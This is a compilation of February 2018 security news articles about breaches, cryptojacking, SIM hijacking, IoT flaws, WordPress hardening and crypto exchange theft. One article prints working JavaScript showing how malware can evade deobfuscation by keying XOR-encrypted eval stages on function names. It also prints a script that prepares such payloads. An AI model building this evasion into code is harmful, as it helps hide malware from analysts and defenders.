Tesla has confirmed that hackers have compromised its cloud computing platform to mine cryptocurrency, after the incident was discovered by cloud security firm RedLock.

The hackers have breached the Tesla cloud servers and have installed a crypto currency miner, the company fixed the issue exploited by the hackers “within hours.”

The attackers gained access to the Tesla’s Amazon Web Services environment on a Kubernetes console that was reportedly not password-protected. The console is used by companies to manage the infrastructure deployed on the cloud hosting providers.

“According to RedLock, the hackers discovered log-in details to Tesla’s Amazon Web Services environment on a Kubernetes console – a system originally designed by Google to manage applications. The console was reportedly not password-protected.” states the BBC.

RedLock experts discovered a “pod” inside the Kubernetes console that stored login credentials for one of Tesla’s AWS cloud infrastructure.

The security breach happened in 2017, according to the company no customer data had been stolen.

“Our initial investigation found no indication that customer privacy or vehicle safety or security was compromised in any way,” said a Tesla spokesman.

According to RedLock, the exposed AWS buckets contained sensitive information, including telemetry data.

“The hackers had infiltrated Tesla’s Kubernetes console which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla’s AWS environment which contained an Amazon S3 (Amazon Simple Storage Service) bucket that had sensitive data such as telemetry.” reads a blog post published by RedLock.

Tesla security breach

Tesla promptly fixed the problem once RedLock notified its discovery.

RedLock added that the security breach was caused by Tesla engineers that forgot to implement an authentication mechanism to the Kubernetes console.

Because they used a custom mining pool, it is unclear how much money this hacker group made.

RedLock confirmed that other companies left their bucket exposed online last year, including Aviva and Gemalto.


Control Flow Integrity, a fun and innovative Javascript Evasion Technique
21.2.2018 securityaffairs Hacking

Javascript evasion technique – Security Expert Marco Ramilli detailed a fun and innovative way to evade reverse-engineering techniques based on Javascript technology.
Understanding the real code behind a Malware is a great opportunity for Malware analysts, it would increase the chances to understand what the sample really does. Unfortunately it is not always possible figuring out the “real code”, sometimes the Malware analyst needs to use tools like disassemblers or debuggers in order to guess the real Malware actions. However when the Sample is implemented by “interpreted code” such as (but not limited to): Java, Javascript, VBS and .NET there are several ways to get a closed look to the “code”.
Unfortunately attackers know what the analysis techniques are and often they implement evasive actions in order to reduce the analyst understanding or to make the overall analysis harder and harder. An evasive technique could be implemented to detect if the code runs over a VM or it could be implemented in order to run the code only on given environments or it could be implemented to avoid debugging connectors or again to evade reverse-engineering operations such as de-obfuscations techniques. Today “post” is about that, I’d like to focus my readers attention on a fun and innovative way to evade reverse-engineering techniques based on Javascript technology.
Javascript is getting day-by-day more important in term of attack vector, it is often used as a dropper stage and its implementation is widely influenced by many flavours and coding styles but as a bottom line, almost every Javascript Malware is obfuscated. The following image shows an example of obfuscated javascript payload (taken from one analysis of mine).

Example: Obfuscated Javascript

As a first step the Malware analyst would try to de-obfuscate such a code by getting into it. Starting from simple “cut and paste” to more powerful “substitution scripts” the analyst would try to rename functions and variables in order to split complexity and to make clear what code sections do. But in Javascript there is a nice way to get the callee function name which could be used to understand if a function name changed over the time. That function is the arguments.callee.caller. By using that function the attacker can create a stack trace where it saves the executed function chaining name list. The attacker would grab function names and use them as the key to dynamically decrypt specific and crafted Javascript code. Using this technique the Attacker would have an implicit control flow integrity because if a function is renamed or if the function order is slightly different from the designed one, the resulting “hash” would be different. If the hash is different the generated key would be different as well and it wont be able to decrypt and to launch specific encrypted code.
But lets take a closer look to what I meant. The following snip shows a clear (not obfuscated) example explaining this technique. I decided to show not obfuscated code up here just to make it simple.
var _ = require("underscore");
function keyCharAt(key, i) {
return key.charCodeAt( Math.floor(i % key.length) );
}

function xor_encrypt(key, data) {
return _.map(data, function(c, i) {
return c.charCodeAt(0) ^ keyCharAt(key, i);
});
}

function xor_decrypt(key, data) {
return _.map(data, function(c, i) {
return String.fromCharCode( c ^ keyCharAt(key, i) );
}).join("");

}

function cow001(){
eval(xor_decrypt(arguments.callee.name,[0,0,25,67,95,93,6,65,27,95,87,25,68,34,22,92,89,82,10,0,2,67,16,114,12,1,3,85,94,69,67,59,5,89,87,86,6,29,4,16,120,84,17,10,87,17,23,24]));
}
function pyth001(){
eval(xor_decrypt(arguments.callee.name,[19,22,3,88,0,1,25,89,66]));
}

function pippo(){
pyth001();

}
pippo();
view rawAntiDeobfuscationJavascriptTechnique.js hosted with ❤ by GitHub
Each internal stage evaluates ( eval() ) a content. On row 21 and 25 the function cow001 and pyth001 evaluates xor decrypted contents. The xor_decrypt function takes two arguments: decoding_key and the payload to be decrypted. Each internal stage function uses as decryption key the name of callee by using the arguments.callee.name function. If the function name is the “designed one” (the one that the attacker used to encrypt the payload) the encrypted content would be executed with no exceptions. On the other side if the function name is renamed (by meaning has been changed by the analyst for his convenience) the evaluation function would fail and potentially the attacker could trigger a different code path (by using a simple try and catch statement).
Before launching the Sample in the wild the attacker needs to prepare the “attack path” by developing the malicious Javascript and by obfuscating it. Once the obfuscation took place the attacker needs to use an additional script (such as the following one) to encrypt the payloads according to the obfuscated function names and to replace the newly encrypted payload to the final and encrypted Javascipt file replacing the encrypted payloads with the one encrypted having as a key the encrypted function names.
"use strict"; var _ = require("underscore");
function keyCharAt(key, i) { return key.charCodeAt( Math.floor(i % key.length) ); }
function xor_encrypt(key, data) { return _.map(data, function(c, i) { return c.charCodeAt(0) ^ keyCharAt(key, i); }); }
function xor_decrypt(key, data)
{ return _.map(data, function(c, i)
{ return String.fromCharCode( c ^ keyCharAt(key, i) ); }).join(""); }

var final_payload = "console.log('Malicious Content Triggers Here !')";
var k_final = "cow001";
var encrypted_final = xor_encrypt(k_final,final_payload);
var decrypted_final = xor_decrypt(k_final, encrypted_final); console.log(encrypted_final.toString()); console.log(decrypted_final); var _1_payload = "cow001();";
var k_1 = "pyth001";
var encrypted_1 = xor_encrypt(k_1,_1_payload);
var decrypted_1 = xor_decrypt(k_1, encrypted_1);

console.log(encrypted_1.toString());
console.log(decrypted_1);
view rawAntiDeobfuscationJavascriptPreparationScrypt.js hosted with ❤ by GitHub
The attacker is now able to write a Javascript code owning its own control flow. If the attacker iterates such a concept over and over again, he would block or control the code execution by hitting a complete reverse-engineering evasion technique.

The original post published by Marco Ramilli on his blog at the following URL:

https://marcoramilli.blogspot.it/2018/02/control-flow-integrity-javascript.html


SIM Hijacking – T-Mobile customers were victims an info disclosure exploit
20.2.2018 securityaffairs Hacking  Mobil

Lorenzo Franceschi-Bicchierai published an interesting post on SIM hijacking highlighted the risks for the end users and their exposure to this illegal practice.
In 2017, hackers stole some personal information belonging to T-Mobile customers by exploiting a well-known vulnerability.

A video tutorial titled ‘T-Mobile Info Disclosure exploit’ showing how to use the flaw was also published on the Internet.

Exploiting the vulnerability it is possible to access certain customers’ data, including email addresses, billing account numbers, and the phone’s IMSI numbers.

Such kind of info could be used by hackers in social engineering attack against T-Mobile’s customer support employees with the intent of stealing the victim’s phone number.

SIM hijacking

The attackers can use them to impersonate the target customer, crooks call the T-Mobile customer care posing as the victim with the intent to trick the operator to issue a new SIM card for the victim’s number.

The crooks activate the new SIM and take control of your phone number, then they can use is to steal the victim’s identity. This is the beginning of the nightmare for the victims that suddenly lose their service.

Many web service leverage on user’s phone number to reset their password, this means that the attackers once activated the new SIM can use it to carry on password reset procedures and take over the victims’ accounts on many web services.

Lorenzo reported many stories of SIM hijacking victims, this is the story of the T-Mobile customer Fanis Poulinakis

“Today I lived a nightmare.

My phone all of the sudden stopped working – I tried to contact T-Mobile through twitter—no phone right?—It took them an hour to let me know that someone must have transferred my number to another carrier and they asked me to call my bank to let them know.

I immediately log in on my bank account and voila! $,2000 were gone.

I’ve spent the whole day between T-Mobile, Chase Bank and trying to understand what happened. What a nightmare.

[…] It is unbelievable—and i think it’s also a negligence from T-Mobile’s side that they don’t make it mandatory to have a password connected to the phone number rather than the social number. […] It’s the first time I’m realizing how vulnerable our information is.”

SIM Hijacking could be a true nightmare for the victims, let me suggest reading the other witnesses reported by Lorenzo in his blog post.


JenkinsMiner made $3.4 million in a few months by compromising Jenkins servers
19.2.2018 securityaffairs Hacking

Hacker Group Makes $3 Million by Installing Monero Miners on Jenkins Servers
A criminal organization has made $3.4 million by compromising Jenkins servers and installing a Monero cryptocurrency miner dubbed JenkinsMiner.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows, and has already secured him over $3 million worth of Monero crypto-currency. As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.” states a blog post published by CheckPoint.

Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community.

The automation server supports developers build, test and deploy their applications, it has more than 133,000 active installations worldwide with more than 1 million users.

Jenkins servers

According to the researchers, threat actors behind the massive mining operation were leveraging the CVE-2017-1000353 RCE vulnerability in the Jenkins Java deserialization implementation.

The vulnerability is due to lack of validation of the serialized object, its exploitation allowed the attackers to make Jenkins servers download and install the JenkinsMiner.

“The operation uses a hybridization of a Remote Access Trojan (RAT) and XMRig miner over the past months to target victims around the globe. The miner is capable of running on many platforms and Windows versions, and it seems like most of the victims so far are personal computers. With every campaign, the malware has gone through several updates and the mining pool used to transfer the profits is also changed.” continues the post.

Most of the downloads for the JenkinsMiner are from IP address located in China and assigned to the Huaian government information center, of course, we are not able to determine if the server was compromised or explicitly used by state-sponsored hackers.

Jenkinminer

Further details and IoCs are included in the analysis published by CheckPoint.

In January, security expert Mikail Tunç analyzed Jenkins servers exposed online discovering that many instances leak sensitive information.

Tunç highlighted that Jenkins typically requires credentials to the code repository and access to an environment in which to deploy the code, usually GitHub, AWS, and Azure. Failure to configure the application correctly can expose data to serious risk.

The researcher discovered that many misconfigured systems provided guest or administrator permissions by default, while others allowed guest or admin access to anyone who registered an account.


Unknown hackers stole $6 million from a Russian bank via SWIFT system last year
17.2.2018 securityaffairs Hacking

A new attack against the SWIFT system made the headlines again, unknown hackers have stolen 339.5 million roubles (roughly $6 million) from a Russian bank last year.
The news of the attack against the international payments messaging system was reported on Friday by the Russian central bank, this is the last incident of a long string of cyber heists.

“The volume of unsanctioned operations as a result of this attack amounted to 339.5 million roubles,” states the Russian central bank.

“The central bank said it had been sent information about “one successful attack on the work place of a SWIFT system operator.” reported the Reuters agency.

According to a spokesman for the central bank, hackers took control of a computer at a Russian bank and transferred the money to an account they controlled through the payment messaging system.

The spokesman did not provide details about the attack, he quoted Artem Sychev, deputy head of the central bank’s security department, as saying the hackers implemented “a common scheme”.

“When a case of potential fraud is reported to us, we offer our assistance to the affected user to help secure its environment,” said Natasha de Teran, a spokeswoman for SWIFT.

SWIFT highlighted that its “own systems” have never been compromised by attackers in past attacks.

“Brussels-based SWIFT said late last year digital heists were becoming increasingly prominent as hackers use more sophisticated tools and techniques to launch new attacks.” continues the Reuters.

This isn’t the only cyber attacks against a Russian bank that attempted to steal money through the SWIFT system, in December, hackers tried to steal 55 million roubles from Russian state bank Globex.

The string of attacks began with the cyber attack against Bangladesh Bank in February 2016 that resulted in the theft of $81 million.

Even if the SWIFT hasn’t revealed the exact number of victims of the SWIFT hackers, details on some attacks were revealed, such as the attack on Taiwan’s Far Eastern International Bank.


Unknown Threat Actor Conducts OPSEC Targeting Middle East
15.2.2018 securityaffairs Hacking

Hackers conduct OPSEC Targeting Middle East – Classified Documents That May Pertain To The Jordanian Research House Dar El-Jaleel Are Being Used As Bait In A Campaign Targeting The Middle East.
The researchers Paul Rascagneres with help of Martin Lee, from CISCO TALOS, described a campaign of targeted attacks against the middle east with key elements present: Geopolitical interest at stake, once documents pertaining Research House Dar EL-Jaleel, that research on Israeli-Palestinian conflict and Sunni-Shia conflict with Iran, are being used.

Second, the extensive use of scripting languages (VBScript, PowerShell, VBA) as part of the attack vector, once they are used to be dynamically loaded and execute VBScript functions stored in a Command & Control server.

Third, the attacker had deployed a series of sophisticated countermeasures to hide his identification using Operation Security (OPSEC), utilization of reconnaissance scripts to validate the victim machine according to his criteria, utilization of CloudFlare system to hide the IP and infrastructure and finally using filters on connections based on User-Agent strings to use the infrastructure for short periods of time before vanishing going offline.

Regarding the analysis in the report, the script campaign is divided into a series of steps to further advance the widespread of the infection. The VBS campaign is composed of 4 steps with additional payloads and 3 distinct functions that are: Reconnaissance, Persistence, and Pivoting.

middle east opsec attack

According to the report the first stage starts with a VBScript named من داخل حرب ايران السرية في سوريا.vbs (“From inside Iran’s secret war in Syria.vbs”) that is aimed to create in the second stage a PowerShell script that will generate a Microsoft Office document named Report.doc and to open it. On the third stage, the opened document contains a macro that creates a WSF (Windows Script File) file to be executed. On the fourth stage the script contains configuration information such as: The hostname of the command and control server, the port used 2095 and the User-Agent.

As the report notice, the User-Agent strings are being used to the identification of targets, while the command and control server filter these strings to only allow connections based in these criteria. The script tries to register the infected system with an HTTP request, which in turn executes an infinite loop to further download and use other payloads. The researchers discovered three types of additional payloads that are the following: s0, s1, and s2. These payloads for WSF scripts are VBScript functions that are loaded and executed in ExecuteGlobal() and GetRef() APIs. The difference between the payloads resides on the number of arguments supplied to execute the function.

The researchers found out a reconnaissance function in the earlier steps of the campaign that was intended to acquire information on the targeted system, verify if it contained significant information or if it was a sandbox machine. The hackers layered out a methodology composed of these steps: first acquiring the serial number of disk volume, and then using a payload to acquire information on any anti-virus software present on the system. Next, by querying ipify.org the hackers tried to obtain the IP address of the infected machines to further obtain the computer name, username, operating system and architecture.

A second function is used to list the drives on the system and its type.

Finally, the researchers cover the remaining two functions: Persistence and Pivoting. Persistence functions were used alongside the reconnaissance functions linked to the WSF script. While the first script was used to persist, the second was used to clean the infected system to cover its tracks. Regarding the Pivoting function, it receives an argument where the PowerShell script executes a second base64 encoded script intended to download shellcode from 176.107.185.246 to be mapped in the memory and then executed.

As the researchers noticed, the hackers behind the campaign had been very careful to protect their infrastructure and their code against the leak. The command and control server was protected by CloudFlare to avoid tracking and difficult the analysis. Furthermore, by using filters on the User-Agents the hackers selected requests that only meet their criteria.

The Threat Actor was only seen active during the morning, on the Central European Time zone, to unleash their attacks and payloads. Once infected the operating system receives the pivot function to disable the firewall and allow the unique IP to receive the shellcode. Next, the server becomes unreachable. The researchers point out: “This high level of OPSEC is exceptional even among presumed state-sponsored threat actors”.

The researchers also noticed some similarities with Jenxcus (Houdini/H-Worn), but it was not clear if it is a new version or an adaption. They for sure agree that it is far more advanced in the resources it presents. The researchers state:

“This document is a weekly report about the major events occurring during the 1st week of November 2017, talking about the most important events happening in Jordan, Iraq, Syria, Lebanon, Palestine, Israel, Russia, ISIS and the ongoing Gulf Countries conflict with Qatar. These campaigns show us that at least one threat actor is interested in and targeting the Middle East. Due to the nature of the decoy documents, we can conclude that the intended targets have an interest in the geopolitical context of the region”.

Sources:

http://www.securityweek.com/actor-targeting-middle-east-shows-excellent-opsec

http://www.securitynewspaper.com/2018/02/10/targeted-attacks-middle-east/

http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html

https://blogs.cisco.com/security/talos/targeted-attacks-in-the-middle-east

https://cyware.com/news/targeted-attacks-in-the-middle-east-8e454752


fail0verflow hackers found an unpatchable flaw in Nintendo Switch bootROM and runs Linux OS
10.2.2018 securityaffairs Hacking

The group of hackers known as ‘fail0verflow’ has discovered a vulnerability in the gaming console Nintendo Switch that could be exploited to install a Linux distro.
The hackers announced their discovery in a post on Twitter, the published an image of a console running the Debian Linux distro after the hack.


fail0verflow
@fail0verflow
🐧🐧🐧🐧 #switch

4:16 PM - Feb 6, 2018
4,917
2,269 people are talking about this
Twitter Ads info and privacy
The fail0verflow group revealed that the exploit triggers a flaw in the boot ROM process of the Nvidia Tegra X1 chip that powers the console, if confirmed the issue cannot be solved with a software o firmware update.

When asked if they have built the hack on nvtboot the group No closed-source boot chain components were involved.

Discovery of a flaw in the Boot ROM opens the door to the hack of the console for other purposes, for example to the piracy.

nintendo switch

In a next future, hackers could find a way to install homebrew apps and pirated games on the Nintendo Switch.

On the other side, Nintendo could work with Nvidia on new secure Tegra X1 chips, as a temporary solution it could ban users with hacked consoles to ban these users from online play.


Hackers From Florida, Canada Behind 2016 Uber Breach
7.2.2018 securityweek Hacking
Uber shares more details about 2016 data breach

Two individuals living in Canada and Florida were responsible for the massive data breach suffered by Uber in 2016, the ride-sharing company’s chief information security officer said on Tuesday.

In a hearing before the Senate Subcommittee on Consumer Protection, Product Safety, Insurance, and Data Security, Uber CISO John Flynn shared additional details on the data breach that the company covered up for more than a year.

The details of 57 million Uber riders and drivers were taken from the company’s systems between mid-October and mid-November 2016. The compromised data included names, email addresses, phone numbers, user IDs, password hashes, and the driver’s license numbers of roughly 600,000 drivers. The incident was only disclosed by Uber’s CEO, Dara Khosrowshahi, on November 21, 2017.

Flynn told the Senate committee on Tuesday that the data accessed by the hackers had been stored in an Amazon Web Services (AWS) S3 bucket used for backup purposes. The attackers had gained access to it with credentials they had found in a GitHub repository used by Uber engineers. Uber decided to stop using GitHub for anything other than open source code following the incident.

Uber’s security team was contacted on November 14, 2016, by an anonymous individual claiming to have accessed Uber data and demanding a six-figure payment. After confirming that the data obtained by the hackers was valid, the company decided to pay the attackers $100,000 through its HackerOne-based bug bounty program to have them destroy the data they had obtained.

While some members of Uber’s security team were working on containing the incident and finding the point of entry, others were trying to identify the attackers. The man who initially contacted Uber was from Canada and his partner, who actually obtained the data, was located in Florida, the Uber executive said.

“Our primary goal in paying the intruders was to protect our consumers’ data,” Flynn said in a prepared statement. “This was not done in a way that is consistent with the way our bounty program normally operates, however. In my view, the key distinction regarding this incident is that the intruders not only found a weakness, they also exploited the vulnerability in a malicious fashion to access and download data.”

A code of conduct added by HackerOne to its disclosure guidelines last month includes an entry on extortion and blackmail, prohibiting “any attempt to obtain bounties, money or services by coercion.” It’s unclear if this is in response to the Uber incident, but the timing suggests that it may be.

The Uber CISO has not said if any actions have been taken against the hackers, but Reuters reported in December that the Florida resident was a 20-year-old who was living with his mother in a small home, trying to help pay the bills. The news agency learned from sources that Uber had decided not to press charges as the individual did not appear to pose a further threat.

Flynn admitted that “it was wrong not to disclose the breach earlier,” and said the ride-sharing giant has taken steps to ensure that such incidents are avoided in the future. He also admitted that the company should not have used its bug bounty program to deal with extortionists.

Uber’s chief security officer, Joe Sullivan, and in-house lawyer Craig Clark were fired over their roles in the breach. Class action lawsuits have been filed against the company over the incident and some U.S. states have announced launching investigations into the cover-up.

U.S. officials are not happy with the way Uber has handled the situation.

“The fact that the company took approximately a year to notify impacted users raises red flags within this Committee as to what systemic issues prevented such time-sensitive information from being made available to those left vulnerable,” said Sen. Jerry Moran, chairman of the congressional committee.

Just before the Senate hearing, Congresswoman Jan Schakowsky and Congressman Ben Ray Lujan highlighted that Uber had deceived the Federal Trade Commission (FTC) by failing to mention the 2016 breach while the agency had been investigating another, smaller cybersecurity incident suffered by the firm in 2014.


Hackers can remotely access adult sex toys compromising at least 50.000 users
7.2.2018 securityaffairs Hacking

Researchers discovered that sex toys from German company Amor Gummiwaren GmbH and its cloud platform are affected by critical security flaws.
As a result for Master Thesis by Werner Schober in cooperation with SEC Consult and the University of Applied Sciences St. Pölten, it was discovered that sex toys from German company Amor Gummiwaren GmbH and its cloud platform are affected by critical security flaws.

In an astonishing revelation, multiple vulnerabilities were discovered in “Vibratissimo” secy toys and in its cloud platform that compromised not only the privacy and data protection but also physical safety of owners.

sexy toys

The database pertaining all customers data was accessible via internet in such a way that explicit images, chat logs, sexual orientation, email addresses and passwords in clear text were compromised.

A total lack of security measures had caused the enumeration of all explicit images of users compromising their identities due to the utilization of predictable numbers and absence of authorization verification. Hackers could even give pleasure to users without their consent using the internet or standing nearby the address within the range of Bluetooth. These are only a few dangers users are exposed once connected to the world of the Internet of Things (IoT).

The Internet of Things (IoT) is a technology that comprises a myriad of devices connected to the internet and has evolved in such way that is present in many products used in a daily basis, from cars to home utilities. Once taking this into account we see the arising of a new sub-category within the Internet of Things (IoT) named Internet of Dildos (IoD). The Internet of Dildos (IoD) comprehends every device connected to networks that give mankind pleasure. According to the article, the term from 1975 given to this area of research is the following: “Teledildonics (also known as “cyberdildonics”) is technology for remote sex (or, at least, remote mutual masturbation), where tactile sensations are communicated over a data link between the participants”.

The products from Amor Gummiwaren GmbH that are vulnerable are the following: Vibratissimo Panty Buster, MagicMotion Flamingo, and Realov Lydia. The analysis of researchers focused on Vibratissimo Panty Buster. The panty buster is a sex toy that can be controlled remotely with mobile applications (Android, iOS), but the mobile application, the backend server, hardware, and firmware are developed by third-party company. The application presents many interactive features that enable extensive communication and sharing capabilities, in such a manner that creates a social network where users can expand their experience. Some features are: Search for other users, the creation of friends lists, video chat, message board and sharing of image galleries that can be stored across its social network.

The vulnerabilities found were: Customer Database Credential Disclosure, Exposed administrative interfaces on the internet, Cleartext Storage of Passwords, Unauthenticated Bluetooth LE Connections, Insufficient Authentication Mechanism, Insecure Direct Object Reference, Missing Authentication in Remote Control and Reflected Cross-Site Scripting. As we start taking a glimpse at the vulnerabilities discovered we can consider the following: All credentials of Vibratissimo database environment were leaked on the internet, alongside with the PHPMyAdmin interface that can have allowed hackers to access the database and dump all content.

The PHPMyAdmin interface was accessible throughout the URL http://www.vibratissimo.com/phpmyadmin/ with the stored passwords without encryption in clear text format. The content pertained to the database might have the following data: Usernames, Session Tokens, Cleartext passwords, chat histories and explicit image galleries created by the users themselves. The DS_STORE file and config.ini.php was found on the web server of Vibratissimo in such way that hackers could exploit attack vector like directory listing and discover the operating system which in this case is a MAC OSX.

Also, as disclosed by the researchers, there are great dangers to users in the remote control of the vibrator. The first is related to the connection between the Bluetooth LE of the vibrator and the smartphone application that could lead to eavesdropping, replay and MitM attacks. Although the equipment offers several pairing methods the most dangerous is “no pairing” as noted in the report. This method can allow hackers to search for information on the device as well as write data. If a hacker is in range, he could take control of the device. Also, a man in the middle attack is possible due to the lack of authentication, where a hacker can create a link for itself and then decrement or increment the ID to get direct access to the link used by the person. Due to the lack of authentication, a reflected cross-site scripting is also possible, but as noticed by the researchers it is not as dangerous as the other security issues.

Last but not least the researchers recommend a complete update in the software and mobile application used by the devices. It is highly recommended for all users to change their login information as well as their passwords for greater protection. Not all security flaws were addressed and corrected, therefore there are some dangers loaming around that can be exploited by tools like Shodan and autosploit. It is a social security concern these vulnerabilities since they pose a grave danger to user’s reputation, that can lead to suicide.

Sources:

http://www.securitynewspaper.com/2018/02/03/internet-dildos-long-way-vibrant-future-iot-iod/

https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html

https://www.sec-consult.com/en/blog/advisories/multiple-critical-vulnerabilities-in-whole-vibratissimo-smart-sex-toy-product-range/index.html

https://www.theregister.co.uk/2018/02/02/adult_fun_toy_security_fail/

http://www.zdnet.com/article/this-smart-vibrator-can-be-easily-hacked-and-remotely-controlled-by-anyone

https://mashable.com/2018/02/01/internet-of-dildos-hackers-teledildonics

https://www.cnet.com/news/beware-the-vibratissimo-smart-vibrator-is-vulnerable-to-hacks/

http://www.wired.co.uk/article/sex-toy-bluetooth-hacks-security-fix

https://www.forbes.com/sites/thomasbrewster/2018/02/01/vibratissimo-panty-buster-sex-toy-multiple-vulnerabilities/#37ec1d25a944


9 Tips to Prevent WordPress Hacks in this Dangerous Digital World
7.2.2018 securityaffairs Hacking

WordPress hacks are increasingly common. Whether it’s for malicious reasons, to harm a site or to just insert backlinks, WordPress can be very vulnerable if not cared for and updated regularly. How to Prevent hacks?
So, how do you prevent these security blips – this post aims to show how.

Backup
Regular data backup can save you lots of frustration and headache, and especially after a hack. Taking the necessary measures to ensure information on your WordPress site or blog is backed up before making any significant changes, and doing the same after updates are recommended.

Although most people prefer to backup their data manually, using a plugin can make your work much more manageable. Plugins provide a convenient way to handle data backups at set times or intervals. Backup buddy (a plugin) is pretty good at this.

Although a paid option, this plugin exports everything on your WP from settings, files, images, and content on the database. You could also opt for free plugins as well.

Update the WordPress Version as Quickly as the New Comes
Updating your blog/site to the latest WP version can also save you lots of trouble. The regular updates are not only meant to make your experience much better but also patches security loopholes that could otherwise be manipulated by hackers.

You can simply follow WordPress feeds to find out about new updates, or just log in to the blog as admin. Be sure to follow WordPress Development blogs to get the latest updates on when the next patch or fixed will be released.

Check Themes and Plugins for Continued Support
Only used plugins and themes with continuous support and updates. It is through the continued support that developers of the same can release patches to make their plugins hacker-proof.

Any outdated or plugins/themes that no longer receive updates should be avoided, or uninstalled altogether. Most developers only provide support for about a year or two, then discontinue support for the same.

Be sure to look for themes or plugins with active support, receives frequent updates, well-rated, and customer support. You will be surprised to know most of the top-selling themes are outdated or longer receive updates. Look at the comment section for red flags and other indicators of flaws in the same before making an order.

Most of the premium WordPress themes will come bundled with third-party plugins. Some of the plugins bundled with the theme may or may not receive frequent updates.

Revolution Slider is an excellent example of plugins that come bundled with lots of themes on ThemeForest. This plugin had a major vulnerability back in 2014.

The thousands of sites that used this plugin were hacked with most of the hacks redirecting traffic to malicious sites. Although the developers of the same were pushing out updates for their themes, one loophole cost many websites a fortune.

As a precaution, consider investing in plugins that aren’t bundled with extra ‘freebies’. If need be, buy each plugin individually to reduce vulnerabilities to your site. You also need to turn on updates on these plugins to keep your site safe as well.

Keep the WP Admin Directory Protected
The admin directory in WP should always be password protected at all times. It holds the key to every function and security of the site. Password protecting the WP-admin directory helps keep hackers and other malicious people at bay.

This also means the admin will be required to enter two passwords to access the admin directory. The first password gives access to the login page with the WP-Admin directory still protected. The fun part about password-protecting this directory is that you get to control all aspects of the site, including unlocking various parts for access to authorized users only.

One way to protect the WP-admin directory is by installing the AskApache Password Protect plugin. The plugin configures enhanced security file permissions and encrypts the directory with a .htpasswd file.

Encrypt Data with Secure Socket Layer (SSL) Certificate
Using the SSL certificate to secure the Admin panel is not only wise but a smart move. This certification ensures data transfer between the server and user browsers is encrypted and almost impossible to breach.

This enhances data security on the site. Getting an SSL certificate is easy too. You can have your hosting firm for one, or just buy the certificate from a dedicated company.

The Let’s Encrypt SSL certificate is available for free and is an open source product as well. This means it does a pretty good job of keeping your site and data secure. Using an SSL certificate on your WP site can also help boost the site’s rankings on Google

Rename the Login URL
Changing the default WP login address to a different one gives your site an extra layer of security. You can do this by accessing the site’s admin URL.

Renaming the URL makes it hard for hackers to brute force their way into the site. Test the new login details with GWDb to see if anyone can guess your login details.

Although a simple maneuver, this trick helps restrict unauthorized entry to your login page. Only individuals with the login URL and details can access the dashboard. You could also use the iThemes Security plugin to rename your login address.


Never use Public Wi-Fi to Log In
Although public Wi-Fi may seem convenient, it poses multiple threats to your devices, sites, and online activity. Any malicious person on the same network or running packet sniffing software can sniff out any personal data you send via the same. If you have to log in to your WP site admin panel, then ensure you have an SSL certificate installed, or better still, use a virtual private network (VPN).

Have a VPN service installed on your computer or any other device just in case you need to log in to your site. It would also be a good habit to have the VPN running even with the SSL certificate installed. Never underestimate the skills of a black hat hacker targeting your site.

Disable File Editing
Users with admin access to your WP site or dashboard can edit or even change files on the site. This includes themes and plugins already installed in the same.

Disabling file editing on the site means only you can make changes to the site, and also helps make it almost impossible for hackers to change anything on the site. Any hacker that gains access to the WP dashboard will find it hard to change or modify files already on the site. Consider disallowing other users adding content and scripts to the site as well.

To do this, add these commands to the wp-config.php file located at the very end.

Define (‘DISALLOW_FILE_EDIT’, true);

Use the Right Server Configurations and Connections
According to matthewwoodward.co.uk you should only connect the server through SSH or SFTP when setting up the site for the first time. SFTP has more security features enabled as compared to the traditional FTP protocol. These security features are also not attributed to FTP, thus enhanced security.

Connecting the server via SFTP and SSH guarantees secure file transfer. Most web hosting providers can provide this service on request, with some offering it as a part of their packages. You can also enable these features manually too. Some expert knowledge may be needed to connect such safety and without much struggle.


Hacking Amazon Key – Hacker shows how to access a locked door after the delivery
5.2.2018 securityaffairs Hacking

Other problems for the Amazon Key technology, a hacker posted a video on Twitter to show how to access a locked door after a delivery worker’s one-time code has been used.
Earlier in November, Amazon announced for its Prime members the Amazon Key, a program that would allow a delivery person to enter your home under video surveillance, securely drop off the package, and leave with the door locking behind them. The system could also be used to grant access to the people you trust, like your family, friends, or house cleaner.

A few days after the announcement, researchers with Rhino Security Labs demonstrated how to disable the camera on Amazon Key, which could let a rogue courier access the customers’ home.

Amazon Key app.png

Unfortunately, the technology seems to be totally secure, a hacker has in fact demonstrated another attack on the Amazan Key.

The hacker posted a video on Twitter to show how to access a locked door after a delivery worker’s one-time code has been used.

MG
@_MG_
I call this the "Break & Enter dropbox" and it pairs well with my Amazon Key (smartlock & smartcam combo).

It's all current software. Amazon downplayed the last attack on this product because it needed an evil delivery driver to execute. This doesn't.

10:50 PM - Feb 4, 2018
39 39 Replies 1,035 1,035 Retweets 1,187 1,187 likes
Twitter Ads info and privacy
Technical details of the attack are not available, the hacker used a “dropbox” device that appears as tiny PC with Wi-Fi connectivity that is able to control the Amazon Key.

The Dropbox can be used to unlock the Amazon Key or to trigger a DoS condition in which the Amazon’s device is not able to lock the door after a courier accessed the customers’ home.


Japan Raids Hacked Crypto Exchange, Bitcoin Plunges Further
3.2.2018 securityweek Hacking
Japanese authorities on Friday raided virtual currency exchange Coincheck, a week after the Tokyo-based firm lost $530 million in cryptocurrency to hackers.

The raid comes as bitcoin dipped below $9,000 for the first time since November after India said Thursday it would take measures to prevent the use of cryptocurrencies.

The search of Coincheck's headquarters in Tokyo's Shibuya district was carried out by the Financial Services Agency, which had already slapped the company with an administrative order following the hack.

"We have launched an on-site inspection to ensure preservation of clients' assets," Finance Minister Taro Aso said at a briefing.

Japanese officials have suggested Coincheck lacked proper security measures, making itself vulnerable to theft.

The January 26 hack, which saw thieves syphon away 523 million units of the cryptocurrency NEM, exceeds the $480 million stolen in 2014 from another Japanese virtual currency exchange, MtGox.

Earlier this week, Japan's FSA gave Coincheck until February 13 to investigate the cause of the incident, "properly" deal with clients, strengthen risk management and take preventive measures.

Coincheck has said it will use its own funds to reimburse all 260,000 customers who lost holdings, at a rate of 88.549 yen per NEM.

The refund, which will be paid in yen, not virtual currency, will set the firm back about 46.3 billion yen ($422 million).

In the wake of the MtGox scandal, Japan passed a law on cryptocurrencies that requires exchanges to be regulated by the FSA. The law went into effect in 2017.
